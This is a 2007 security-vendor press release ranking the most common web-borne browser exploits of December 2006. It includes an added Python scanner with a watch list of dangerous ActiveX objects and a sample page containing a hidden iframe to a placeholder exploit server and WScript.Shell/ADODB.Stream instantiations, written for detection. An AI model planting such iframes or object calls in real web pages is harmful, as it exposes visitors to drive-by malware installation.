EXPLOIT PREVENTION LABS RELEASES DECEMBER EXPLOIT PREVALENCE SURVEY

“Q406 Roll-up” Exploit Package Dominates with 70.9 Percent of all Occurrences

January 23, 2007 – Atlanta, GA – Exploit Prevention Labs (http://www.explabs.com), a leading developer of safe surfing software that protects against phishing, social engineering and other web-based exploits, today released the results of its December 2006 Exploit Prevalence Survey™. Now in its eighth month, the Exploit Prevalence Survey is the industry’s only survey to use real-world data to definitively measure the most widespread web-borne exploits. Results are derived from automated reports submitted by users of Exploit Prevention Labs’ LinkScanner family of safe surfing applications, combined with data collected from all levels of the company’s multi-faceted research network.

Roger Thompson, CTO of Exploit Prevention Labs and author of the monthly Exploit Prevalence Survey, noted increased activity among cybercriminals in December. Thompson has dubbed this month’s most common package, accounting for more than 70% of all reports, the “Q406 Roll-up” package, as it consists largely of updated versions of exploits issued during the fourth quarter of 2006.

“The dominance of this package reinforces the fact that the development and release of exploits frequently parallels legitimate software businesses,” noted Thompson. “The bad guys are working hard to update and release tweaks to existing exploits at least in part because developing a new exploit is a complex development task.”

According to Thompson, the most common exploits in the package are Setslice, VML and XML, all of which were derived from proof-of-concepts released by HD Moore during his Month of Browser Bugs in September 2006. “The entire package is heavily encrypted, but it appears there are around a dozen individual exploits included.”

Also included in the package is the IE Com CreateObject exploit, originally released as a proof of concept in August, and which occupied November’s number one ranking with 30.45 per cent of all occurrences.

In a surprising twist, WebAttacker dropped out of the top five after ranking number two in the November survey. “The bad guys have never really been successful with WebAttacker,” Thompson explained. “Their tweaks never quite worked. Most of the time, the variants were buggy and just shut down the browsers without infecting the PC.”

But Thompson believes the bad guys are not rolling over and admitting defeat. “Unlike previous generations of virus authors who wrote malware for sadistic thrills and bragging rights, today’s exploit authors are doing it for profit,” he reiterated. “With Windows Vista coming and the rapid take-up of Web 2.0 applications, cybercriminals will continue to develop new malicious exploits and users will need to continue to patch assiduously, as well as use exploit-specific protection like LinkScanner.”

Exploit Prevalence Results for the Month of December 2006

The following is a summary of the top five most-reported web exploits for December 2006:

Exploit: Q406 Roll-up package
Rank last month: New
Percent of overall occurrences: 70.90 percent (new)
Description: Comprised of up to a dozen exploits; the most common are setSlice, VML, XML and the IE COM CreateObject code. The package is usually heavily encrypted, making it difficult to single out individual exploits.

Exploit: MDAC
Rank last month: 6
Percent of overall occurrences: 5.70 percent (4.50 previous)
Description: Although technically not a single exploit, MDAC (Microsoft Data Access Components) refers to a creative method of using certain ActiveX controls in a context for which Microsoft did not originally intend them. The attacking web script instantiates one of these controls and uses it to write files to disk and execute them.

Exploit: IE COM CreateObject
Rank last month: 1
Percent of overall occurrences: 4.50 percent (30.21 previous)
Description: IE COM CreateObject was originally released in August as a proof of concept. The exploit creates a COM object in a mode that Microsoft never anticipated. Although the underlying functions were intended for useful purposes, in the hands of a cybercriminal they are dangerous: they allow files to be saved to disk and executed from it.

Exploit: Iframers launcher script
Rank last month: 5
Percent of overall occurrences: 3.60 percent (6.26 previous)
Description: Propagated by a cybercrime organization sometimes called the CoolWebSearch gang or the Russian iframers, generally thought to be based in St. Petersburg, Russia, and responsible for the Circuit City hack in early June 2006. Using a simple HTML tag, an iframe, embedded on a hacked web site, the visitor’s browser is silently redirected to an exploit server operated by the gang, which attempts to deposit up to eight different exploits onto the user’s computer.

Exploit: WMF (CVE-2005-4560) with known payload
Rank last month: 4
Percent of overall occurrences: 2.70 percent (7.20 previous)
Description: Windows Metafile exploit from December 2005. Uses a little-known feature of Windows Metafiles (the SetAbortProc escape) to execute arbitrary code, including malware. The exploit, a genuine zero-day attack, was allegedly purchased for $5,000 from a Russian hacking group. Almost a year after Microsoft issued its out-of-band patch (MS06-001, January 2006), it is still widely used by cybercriminals.

Note: The numbers above do not add up to 100 percent because of the following lesser-reported exploits: WebAttacker (2.30% vs. 23.33% previous), WMF with unknown payload (1.40%), QuickTime href worm (1.20%, new), IE VML overflow (1.20% vs. 4.0% previous) and others (3.80%).
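The two delivery techniques the table describes, a hidden or off-site iframe that pulls in an exploit server's page and a script that instantiates a file-writing ActiveX/COM object, are exactly what a link scanner looks for in fetched HTML. The following is an added example, not code from Exploit Prevention Labs or LinkScanner, of a minimal static check for both indicators over a constructed sample page; the page content, the host name and the 198.51.100.23 address are all made up for illustration, and the list of ProgIDs is an assumed starting set rather than a complete one.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed watch list of COM ProgIDs that let script write to or run files on
# the local disk; the "MDAC"-style launchers in the survey rely on objects
# like these. Extend as needed.
DANGEROUS_PROGIDS = {
    "adodb.stream",
    "scripting.filesystemobject",
    "wscript.shell",
    "shell.application",
    "microsoft.xmlhttp",
    "msxml2.xmlhttp",
}

# Matches new ActiveXObject("ProgID") / new ActiveXObject('ProgID') in script text.
ACTIVEX_RE = re.compile(r"""new\s+ActiveXObject\s*\(\s*['"]([^'"]+)['"]""", re.IGNORECASE)


class ExploitIndicatorParser(HTMLParser):
    """Collects suspicious iframes and dangerous ActiveX instantiations."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []          # (kind, detail, extra) tuples
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            src = a.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            style = a.get("style", "").replace(" ", "").lower()
            # Iframers hide the frame: zero/one-pixel box or CSS hidden.
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or "display:none" in style or "visibility:hidden" in style)
            # Injected frames usually point at a third-party exploit server.
            offsite = bool(host) and host != self.page_host
            if hidden or offsite:
                self.findings.append(("iframe", src, {"hidden": hidden, "offsite": offsite}))
        elif tag == "script":
            self._in_script = True

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data (CDATA mode).
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._script_buf)
            self._script_buf = []
            for m in ACTIVEX_RE.finditer(body):
                progid = m.group(1).lower()
                if progid in DANGEROUS_PROGIDS:
                    self.findings.append(("activex", progid, {}))


def scan_html(html, page_host):
    """Return the list of indicators found in an HTML document served by page_host."""
    parser = ExploitIndicatorParser(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a legitimate-looking page with an injected launcher.
SAMPLE_PAGE = """<html><body>
<h1>Welcome to our store</h1>
<iframe src="http://198.51.100.23/in.cgi?3" width="0" height="0" frameborder="0"></iframe>
<script>
  var s = new ActiveXObject("ADODB.Stream");
  var sh = new ActiveXObject('WScript.Shell');
</script>
<iframe src="/help/faq.html" width="600" height="400"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, detail, extra in scan_html(SAMPLE_PAGE, "www.example-store.com"):
        print(kind, detail, extra)
```

The same-origin FAQ iframe is not reported; only the zero-size, off-site frame and the two file-system-capable ActiveX objects are. A real scanner would additionally fetch what the flagged iframe loads, since the launcher page itself is usually harmless HTML and the obfuscated exploit code lives one hop away on the exploit server.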

Note to media: Members of the media who would like to interview Roger Thompson about this survey may contact Tim Shisler of Dovetail Public Relations at 408-395-3600 or at xpl (at) dovetailpr (dot) com.

For additional background information on exploits and how to protect against them, visit Exploit Prevention Labs’ comprehensive Resource Center at http://www.explabs.com/about/resCenter/.

About the LinkScanner Family of Safe Surfing Software

Exploit Prevention Labs provides a complete family of safe surfing software to protect Internet users against malicious web sites, phishing, social engineering and other web-based exploits.

The LinkScanner family of safe surfing products includes LinkScanner Pro™, LinkScanner Lite™ and LinkScanner Online. LinkScanner Pro™ (free 30-day evaluation: http://www.explabs.com/downloads/LSP), a $29.95 safe surfing Windows application, provides real-time, automatic protection against malicious web sites, drive-by downloads and other crimeware exploits.

LinkScanner Lite (http://www.explabs.com/downloads/LSL) is a free application that provides Internet Explorer users with real-time scanning of Google, MSN and Yahoo search results for web-based threats, as well as on-demand scanning of individual links. Support for Firefox and other browsers and search engines is in development.

LinkScanner Online, available at http://linkscanner.explabs.com, is a free real-time online URL scanning service that lets users know whether any individual site they intend to visit has been poisoned by an exploit distribution network. LinkScanner Online supports all major web browsers and is freely available for incorporation into third-party websites. Interested webmasters can request the code through Exploit Prevention Labs’ website at http://www.explabs.com/LinkScanner/MyLinkScanner/.

About Exploit Prevention Labs

Founded by information security veterans Bob Bales and Roger Thompson in 2005, Exploit Prevention Labs develops the LinkScanner family of safe surfing software and services. LinkScanner Pro, LinkScanner Lite and LinkScanner Online provide patent-pending protection against malicious web sites and web-based exploits during the critical risk window between the announcement of a security vulnerability and the provision of a patch by the vendor. A Software Development Kit (SDK) is also available to enable third party vendors to incorporate Exploit Prevention Labs’ technology in their own applications and services. More information about Exploit Prevention Labs and LinkScanner may be found on the company’s website at http://www.explabs.com.

###

Media Contact:
Tim Shisler/Julie Parayno
Dovetail Public Relations
408.395.3600
xpl at dovetailpr.com